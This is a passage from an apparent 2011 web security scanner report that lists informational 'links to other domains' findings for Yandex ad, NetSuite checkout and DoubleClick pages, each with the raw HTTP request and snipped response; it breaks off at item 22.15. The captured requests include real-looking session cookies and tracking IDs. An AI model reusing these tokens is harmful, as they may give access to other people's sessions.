Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:05 GMT
Expires: Mon, 25 Apr 2011 14:20:05 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 7397

var y5_sLinkHead = 'http://an.yandex.ru/count/CvVSK7g7hke40000ZhKnMDi4XP4H3fQb-Qd2aRHle6OCarIaeW00G7m3';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {
if
...[SNIP]...
</span>','=i8Br_PK2cm5kGpa1YQ8wP1oOYncShoHYjPgkj8TAagXH_XwTe-vs0u-xwCP92v-ryehu3fbfe91g6AUF6q6ae000G7y7','0'] ];
var aLinkHow = ['<a target="_blank" href="http://advertising.yandex.ru/welcome/?from=context">........ ....................</a>','=bnwoofK2cmHhK3i1cg6sEbYIfd5k38-w49TH3f-pz3zU2wG0U0G0'];
var aLinkAll = ['<a href="http://direct.yandex.ru/search?from=http://webalta.ru/&ref-page=57617" target=_blank>...... ....................</a>
...[SNIP]...

22.6. http://an.yandex.ru/code/66894  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /code/66894

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /code/66894?rnd=928638&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fpogoda.webalta.ru%2F&grab=dNCf0L7Qs9C-0LTQsCDQvdCwIHdlYmFsdGEucnU= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:30 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:30 GMT
Expires: Mon, 25 Apr 2011 14:20:30 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:20:30 GMT
Content-Length: 3561

var y5_sLinkHead = 'http://an.yandex.ru/count/1QrEGmZSpqW40000ZhuoMDi4XPvK49Qke0McaRm8UAa3arIapW0000m8VWC0';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...
</span>','=6PqWd9K2cm5kGpI9YLYOM9oymSKk1Pg9ZvAcFOKUdQZRgmQFk1JM6WsVlwnQ7GUPLw2GSGAdYZD1fC80000C27m7','0'] ];
var aLinkHow = ['<a target="_blank" href="http://advertising.yandex.ru/welcome/?from=context">........ ....................</a>
...[SNIP]...

22.7. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

NETSPARKER /s.nl?c=438708&sc=4&whence=&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368828460:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; path=/
Set-Cookie: NLVisitorId=rcHW8495AYoCDqLY; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AZACDgGn; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=868
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 26851


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document
...[SNIP]...
00&amp;bgbutton=F2F4F6&amp;bgrequiredfld=ffffff&amp;font=Arial%2CHelvetica%2Csans-serif&amp;size_site_content=10pt&amp;size_site_title=10pt&amp;size=1.0&amp;nlinputstyles=T&amp;NS_VER=2011.1.0&amp;3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...
<div><img src="https://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt=""></div>
...[SNIP]...

22.8. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl/c.438708/n.1/sc.4/.f

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /s.nl/c.438708/n.1/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:46 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1256561231:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=862
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33384


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document.lo
...[SNIP]...
00&amp;bgbutton=F2F4F6&amp;bgrequiredfld=ffffff&amp;font=Arial%2CHelvetica%2Csans-serif&amp;size_site_content=10pt&amp;size_site_title=10pt&amp;size=1.0&amp;nlinputstyles=T&amp;NS_VER=2011.1.0&amp;3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...
<div><img src="https://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt=""></div>
...[SNIP]...

22.9. http://direct.yandex.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
<link rel="SHORTCUT ICON" href="/favicon.ico"><script type="text/javascript" src="http://img.yandex.net/y5/1.5b-c/mega-y5.js"></script><link rel="shortcut icon" href="/favicon.ico"/><script type="text/javascript" charset="utf-8" src="//yandex.st/jquery/1.4.2/jquery.min.js"></script><script type="text/javascript" charset="utf-8" src="//yandex.st/lego/2.4-73/common/js/_common.js"></script>
...[SNIP]...
<noscript><img alt=" " style="position:absolute" src="//mc.yandex.ru/watch/34"></noscript>
...[SNIP]...
<noscript><img alt=" " style="position:absolute" src="//mc.yandex.ru/watch/191494"></noscript>
...[SNIP]...
<div class="b-head-logo__logo">
<a href="http://www.yandex.ru" class="b-head-logo__link"><img class="b-head-logo__img" border="0" alt="............" src="//yandex.st/lego/_/X31pO5JJJKEifJ7sfvuf3mGeD_8.png"/></a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://metrika.yandex.ru" class="b-head-tabs__link">..............</a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://partner.yandex.ru" class="b-head-tabs__link">.................. ........</a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://partner.market.yandex.ru/yandex.market/" class="b-head-tabs__link">............</a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://ba.yandex.ru" class="b-head-tabs__link">........</a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://money.yandex.ru" class="b-head-tabs__link">............</a>
...[SNIP]...
<li class="b-dropdown__item b-dropdown__visible">

<a class="b-dropdown__or" href="http://www.yandex.ru/all"><span class="b-pseudo-link">
...[SNIP]...
<li class="b-dropdown__item"><a href="http://api.yandex.ru">API</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://webmaster.yandex.ru">..................</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://widgets.yandex.ru">..............</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://yaca.yandex.ru">..............</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://narod.yandex.ru">..........</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://site.yandex.ru">.......... ...... ..........</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://pdd.yandex.ru">.......... ...... ............</a>
...[SNIP]...
<li class="b-dropdown__item b-dropdown__line"><a href="http://www.yandex.ru/all">...... ..............</a>
...[SNIP]...
<td class="b-hmenu__item item">
<a href="http://wordstat.yandex.ru/" onclick="try {yaCounter191494.reachGoal('MDNWORDNO'); } catch (e) {};OpenWindow('http://wordstat.yandex.ru/?direct=1', 870, 600, 'advq', 1); return false;">............ ........</a>
...[SNIP]...
<td class="b-head-userinfo__entry"><a href="http://passport.yandex.ru/passport?mode=auth&msg=direct&retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl" class="b-pseudo-link">..........</a>
...[SNIP]...
<div class="b-morda-main__pay">.... ..................:<a href="http://money.yandex.ru/"><img class="b-morda-main__pay__img" src="/block/b-morda-main/pay/b-morda-main__pay-yamoney.gif" alt="........................." title="........................."/>
...[SNIP]...
</div><a class="b-morda-main__details" href="http://advertising.yandex.ru/welcome/" onclick="">.................. .. ...........................</a>
...[SNIP]...
</strong>.................. .......... ............................ <a target="_blank" href="http://help.yandex.ru/direct/?id=1116045">.................. .................... ................</a>
...[SNIP]...
<li class="b-morda-info__item">............................ <a href="http://clck.yandex.ru/redir/dtype=stred/pid=36/cid=70390/*http://www.advertising.yandex.ru/welcome/pdf/direct_booklet.pdf" onclick="try {yaCounter191494.reachGoal('MDIRDOWNPDFOFF'); } catch (e) {};">................ ....&nbsp;..............</a>
...[SNIP]...
<li class="b-morda-info__item">.................. .................. ...................... .................. ................ <a href="http://advertising.yandex.ru/seminar/" target="_blank" onclick="try {yaCounter191494.reachGoal('MDNSEMINARALL'); } catch (e) {};">....&nbsp;........................ ..................</a>
...[SNIP]...
<li class="b-morda-info__item">.............. .... ............................ .............. ..&nbsp;.............. <a href="http://metrika.yandex.ru/" target="_blank" onclick="try {yaCounter191494.reachGoal('MDNMETRIKAALL'); } catch (e) {};">...........................</a>
...[SNIP]...
<li class="b-morda-info__item">.............. ...... ........ <a href="http://advertising.yandex.ru/" target="_blank" onclick="try {yaCounter191494.reachGoal('MDNADVERTALL'); } catch (e) {};">.................. ........................ ..............</a>
...[SNIP]...
<p>........ .. ...... ........ ........, .................. .. <a href="http://partner.yandex.ru/?hnt=dir" target="_blank" onclick="try {yaCounter191494.reachGoal('MDNEAMALL'); } catch (e) {};">.................. ........ ..............</a>
...[SNIP]...
<p>.................... .............. ..&nbsp;.............. .......... <a href="http://advertising.yandex.ru/contact/agency/" onclick="try {yaCounter191494.reachGoal('MDNAGENCYALL'); } catch (e) {};">.................. ..................</a>
...[SNIP]...
<noscript onclick="return {name: 'i-flashcookie'}"><img src="http://kiks.yandex.ru/fu/" alt="" /></noscript>
...[SNIP]...
</a>&nbsp;&middot;
<a href="http://direct.yandex.com">in English</a>
...[SNIP]...
</span> &laquo;<a href="http://www.yandex.ru/">............</a>
...[SNIP]...
</a>&nbsp;&middot; <a href="http://advertising.yandex.ru/">..............</a>
...[SNIP]...

22.10. http://foreign.dt00.net/zones/zone25.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://foreign.dt00.net
Path:   /zones/zone25.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /zones/zone25.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/doping.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:03 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 644


document.write('<div style="height:90px;overflow:hidden;background:url(http://img.dt00.net/images/banners/ap-banner-bg.png) no-repeat;"><a href="http://usr.marketgid.com/demo/popunder/" target="_blank" style="display:block;margin:28px 0 0 40px;font:700 11px Tahoma,Verdana,Arial;color:#000;text-decoration:none;"><strong style="color:#d93329;">
...[SNIP]...

22.11. http://forums.manageengine.com/fbw  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.manageengine.com
Path:   /fbw

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03a; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:11:52 GMT
Server: Apache-Coyote/1.1
Content-Length: 25830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

<link href="//css.zohostatic.com/discussions/v1/css/feedbackembed.css" type="text/css" rel="stylesheet"/>
<script src="//css.zohostatic.com/discussions/v1/js/zdjquery.min.js" type="text/javascript" ></script>
<script src="//css.zohostatic.com/discussions/v1/js/crossdomain.js" type="text/javascript" ></script>
...[SNIP]...
<div class="footer">
<a href="http://discussions.zoho.com/home"><div class="flRight powzd">
...[SNIP]...

22.12. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=9838414664&w=160&lmt=1303759232&flash=10.2.154&url=http%3A%2F%2Fauto.webalta.ru%2F&dt=1303741232531&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303741232622&frm=0&adk=4086530499&ga_vid=511646108.1303741225&ga_sid=1303741225&ga_hid=1953752540&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=929&eid=33895132&fu=0&ifi=1&dtd=160&xpc=Zp67Lq5gHf&p=http%3A//auto.webalta.ru HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:21 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14005

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://auto.webalta.ru/%26hl%3Dru%26client%3Dca-pub-1134822682510879%26adU%3Dwww.wagnerautoinc.com%26adT%3DYour%2BNew%2BAuto%2BRepair%2BShop%26adU%3Dwestphalchevy.com%26adT%3DChevy%2BAuto%2BDealers%26adU%3Dwww.cityautowreckers.com%26adT%3D1993%2BParts%2BAuto%26adU%3Dwww.eBayMotors.com%26adT%3DeBay%2BMotors%2BOfficial%2BSite%26adU%3DAntag.co.uk/Auto_Moto%26adT%3DAuto%2BMoto%26gl%3DUS&amp;usg=AFQjCNFLmqqweilSDGlL75ZPfwneIRZRLA" target=_blank><img alt=".............. .... Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-ru-100c-000000.png" width=96></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.13. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=9838414664&w=160&lmt=1303759224&flash=10.2.154&url=http%3A%2F%2Fauto.webalta.ru%2F&dt=1303741224908&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303741224970&frm=0&adk=4086530499&ga_vid=511646108.1303741225&ga_sid=1303741225&ga_hid=132012205&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&fu=0&ifi=1&dtd=103&xpc=dKubZykpQN&p=http%3A//auto.webalta.ru HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:14 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13906

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://auto.webalta.ru/%26hl%3Dru%26client%3Dca-pub-1134822682510879%26adU%3Dwww.wagnerautoinc.com%26adT%3DYour%2BNew%2BAuto%2BRepair%2BShop%26adU%3Dwestphalchevy.com%26adT%3DChevy%2BAuto%2BDealers%26adU%3Dwww.cityautowreckers.com%26adT%3D1993%2BParts%2BAuto%26adU%3Dwww.eBayMotors.com%26adT%3DeBay%2BMotors%2BOfficial%2BSite%26adU%3Dwww.shipasi.net%26adT%3DWorldwide%2BAuto%2BShipping%26gl%3DUS&amp;usg=AFQjCNGXaMgiP48VAuDHxYijK6UMKa1kOQ" target=_blank><img alt=".............. .... Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-ru-100c-000000.png" width=96></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.14. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758835&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Fhourlydeploycom%2Fcoldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html&dt=1303740834875&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303740835053&frm=0&adk=1607234649&ga_vid=1571659581.1303740835&ga_sid=1303740835&ga_hid=2038561959&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=237&xpc=SCB3C2OVZc&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:13:44 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12689

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/hourlydeploycom/coldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.owlcti.com/energy%26adT%3DOwl%2BComputing%2BTech%26adU%3Dwww.ServerTech.com%26adT%3DServer%2BDowntime/Overload%253F%26adU%3Dwww.Deloitte.com/us%26adT%3DInsider%2BThreat%2BSecurity%26gl%3DUS&amp;usg=AFQjCNGaNBAPUAlHhfIQiJnQRGGgqTVeGg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.15. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

